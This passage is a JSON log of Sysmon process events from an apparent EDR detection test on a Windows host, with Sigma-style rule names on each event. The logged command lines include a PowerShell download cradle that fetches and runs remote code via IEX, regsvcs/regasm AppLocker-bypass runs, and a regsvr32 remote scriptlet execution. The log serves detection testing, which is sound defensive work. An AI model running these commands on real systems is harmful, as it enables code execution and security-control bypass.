(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6623-5D3F-0000-001011F68700","ProcessId":5816,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:23.170"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4910,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:23.215719Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","PowerShell Download from URL","Encoded PowerShell Command Line","Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c powershell -c \"(New-Object 
Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6623-5D3F-0000-001011F68700","ParentProcessId":5816,"ProcessGuid":"747F3D96-6623-5D3F-0000-0010BC068800","ProcessId":3000,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:23.380"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4912,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:23.507565Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" 
","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-001067768800","ProcessId":1296,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4916,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:28.250664Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-001062788800","ProcessId":2040,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.222"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4917,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:28.374373Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft .NET Services Installation Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=7D163D3FA313FC69F2510168EFC1240993AAF7D2,MD5=D15EF1C50607B320C31B5697AD126660,SHA256=549CBF63163B33A1CAD7703D4C8A1EF66EEDFFF249A7ECB181C5D2BD78DA2899,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6628-5D3F-0000-001067768800","ParentProcessId":1296,"ProcessGuid":"747F3D96-6628-5D3F-0000-00105B918800","ProcessId":4860,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:28.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4918,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:29.341503Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-0010B1968800","ProcessId":5708,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:28.756"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4919,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:29.565736Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-0010349B8800","ProcessId":6552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:28.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4920,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:29.646278Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-662E-5D3F-0000-001011038900","ProcessId":6020,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:34.216"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4922,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:34.295068Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-662E-5D3F-0000-0010C2048900","ProcessId":1976,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:34.234"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4923,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:34.411034Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6633-5D3F-0000-001051608900","ProcessId":4092,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:39.152"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4925,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:39.312305Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6633-5D3F-0000-001092628900","ProcessId":5056,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:39.223"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4926,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:39.358048Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft .NET Assembly Registration Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=A580AF099F754953480323F6369E5534261F082E,MD5=E99BD2E860B0D73E55708200A600DA35,SHA256=CD5FBB0AC9EBBD64AE84624D428CE30FF17FD586F71F8C5580BC57B176E6716B,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6633-5D3F-0000-001051608900","ParentProcessId":4092,"ProcessGuid":"747F3D96-6633-5D3F-0000-0010D9778900","ProcessId":3512,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:39.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4928,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:39.907321Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6638-5D3F-0000-00103DA88900","ParentProcessId":1652,"ProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ProcessId":4288,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:33:44.622"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4931,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:44.641177Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ProcessId":4288,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-29 21:33:44.806"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4932,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:44.819320Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without 
DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ParentProcessId":4288,"ProcessGuid":"747F3D96-6639-5D3F-0000-001074F48900","ProcessId":208,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:45.332"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4933,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:45.581170Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
